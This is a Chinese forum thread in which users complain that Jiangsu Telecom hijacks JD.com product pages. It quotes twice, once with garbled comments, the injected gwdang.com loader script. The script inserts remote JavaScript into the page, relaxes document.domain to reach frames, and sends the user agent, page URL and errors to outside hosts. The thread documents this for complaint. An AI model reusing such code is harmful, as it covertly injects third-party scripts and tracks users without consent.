|
阅读:2917回复:2
江苏电信劫持京东产品详细页
例如污染的网址http://item.jd.com/1779807.html
使用的劫持脚本 http://browser.gwdang.com/js/loader-jsdx.js 刷新后依然有 投诉电信说72小时联系 受不了,先直接ADB屏蔽了. (function() {
'use strict'
new Image().src = 'http://browser.gwdang.com/visit/?action=track:loader-jsdx&random=' + Math.random()
if (window.GOUWUDEXE) return
window.GOUWUDEXE = 'gwdangjsid'
var trytimes = 0;
window.onerror = function(message, url, line) {
if (!url) return;
var msg = {};
//璁板綍瀹㈡埛绔幆澧�
msg.ua = window.navigator.userAgent;
//鍙褰昺essage閲岀殑message灞炴€у氨濂戒簡锛�
//閿欒淇℃伅鍙兘浼氭瘮杈冩櫐娑╋紝鏈変簺淇℃伅瀹屽叏鏃犵敤锛屽簲閰屾儏杩囨护
msg.message = message.message;
msg.url = url;
msg.line = line;
msg.page = window.location.href;
var s = [];
//灏嗛敊璇俊鎭浆鎹㈡垚瀛楃涓�
for (var key in msg) {
s.push(key + '=' + msg[key]);
}
s = s.join('&');
//杩欓噷鏄敤澧炲姞鏍囩鐨勬柟娉曡皟鐢ㄦ棩蹇楁敹闆嗘帴鍙o紝浼樼偣鏄瘮杈冪畝娲併€�
log(encodeURIComponent(s))
};
function _inject2(b) {
var protocol = location.protocol === 'https:' ? 'https:' : 'http:'
var s = document.createElement("script")
s.type = "text/javascript"
s.charset = "utf-8"
s.src = protocol + '//browser.gwdang.com/get.js?f=/js/gwdang-notifier-jsdx.js'
// s.src = 'http://127.0.0.1:8080/dest/gwdang-notifier-jsdx.all.js'
s.onerror = function() {
log('srcerror')
}
b.appendChild(s)
}
function cnz(){
var b = document.body;
var script = document.createElement('script');
script.src = "http://s4.cnzz.com/z_stat.php?id=1256288985&web_id=1256288985";
script.async = true;
script.defer = true;
script.language="JavaScript";
b.appendChild(script);
}
function log(s) {
var img = document.createElement('img')
img.src = 'http://browser.gwdang.com/log-xdsj.js?type=' + s
}
function inject2(w) {
if (location.host.indexOf('jd.com') > 0) document.domain = 'jd.com'
if (trytimes > 20) {
log('20times');
if (document.body) _inject2(document.body)
return;
}
if (trytimes > 10) {
try {
w.document
} catch (e) {
var hosts = location.host.split('.')
var domain = hosts[hosts.length - 2] + '.' + hosts[hosts.length - 1]
document.domain = domain;
}
}
trytimes++
if (!w) return
try {
if (w && w.document && w.document.body && w.document.body.getElementsByTagName('div').length) _inject2(w.document.body)
else setTimeout(function() {
inject2(w)
}, 300)
} catch (e) {
setTimeout(function() {
inject2(w)
}, 300)
}
}
function inject1() {
if (trytimes > 10) {
log('inject1');
return;
}
trytimes++
if (document.getElementById('m')) inject2(document.getElementById('m').contentWindow)
else setTimeout(inject1, 300)
}
setTimeout(function() {
try {
inject1()
cnz()
} catch (e) {
log(e.message)
}
}, 1200)
})() |
|
|
1楼#
发布于:2015-09-29 23:33
投诉工信部保管一个准
|
|
|
|
2楼#
发布于:2017-02-04 10:53
这个劫持脚本还在,还能打开查看
(function() {
'use strict'
new Image().src = 'http://browser.gwdang.com/visit/?action=track:loader-jsdx&random=' + Math.random()
if (window.GOUWUDEXE) return
window.GOUWUDEXE = 'gwdangjsid'
var trytimes = 0;
window.onerror = function(message, url, line) {
if (!url) return;
var msg = {};
//记录客户端环境
msg.ua = window.navigator.userAgent;
//只记录message里的message属性就好了,
//错误信息可能会比较晦涩,有些信息完全无用,应酌情过滤
msg.message = message.message;
msg.url = url;
msg.line = line;
msg.page = window.location.href;
var s = [];
//将错误信息转换成字符串
for (var key in msg) {
s.push(key + '=' + msg[key]);
}
s = s.join('&');
//这里是用增加标签的方法调用日志收集接口,优点是比较简洁。
log(encodeURIComponent(s))
};
function _inject2(b) {
var protocol = location.protocol === 'https:' ? 'https:' : 'http:'
var s = document.createElement("script")
s.type = "text/javascript"
s.charset = "utf-8"
s.src = protocol + '//browser.gwdang.com/get.js?f=/js/gwdang-notifier-jsdx.js'
// s.src = 'http://127.0.0.1:8080/dest/gwdang-notifier-jsdx.all.js'
s.onerror = function() {
log('srcerror')
}
b.appendChild(s)
}
function cnz(){
var b = document.body;
var script = document.createElement('script');
script.src = "http://s4.cnzz.com/z_stat.php?id=1256288985&web_id=1256288985";
script.async = true;
script.defer = true;
script.language="JavaScript";
b.appendChild(script);
}
function log(s) {
var img = document.createElement('img')
img.src = 'http://browser.gwdang.com/log-xdsj.js?type=' + s
}
function inject2(w) {
if (location.host.indexOf('jd.com') > 0) document.domain = 'jd.com'
if (trytimes > 20) {
log('20times');
setTimeout(function(){
if (document.body) _inject2(document.body)
},3000)
return;
}
if (trytimes > 10) {
try {
w.document
} catch (e) {
var hosts = location.host.split('.')
var domain = hosts[hosts.length - 2] + '.' + hosts[hosts.length - 1]
document.domain = domain;
}
}
trytimes++
if (!w) return
try {
if (w && w.document && w.document.body && w.document.body.getElementsByTagName('div').length) _inject2(w.document.body)
else setTimeout(function() {
inject2(w)
}, 300)
} catch (e) {
setTimeout(function() {
inject2(w)
}, 300)
}
}
function inject1() {
if (trytimes > 10) {
log('inject1');
return;
}
trytimes++
if (document.getElementById('m')) inject2(document.getElementById('m').contentWindow)
else setTimeout(inject1, 300)
}
setTimeout(function() {
try {
inject1()
cnz()
} catch (e) {
log(e.message)
}
}, 1200)
})() |
|
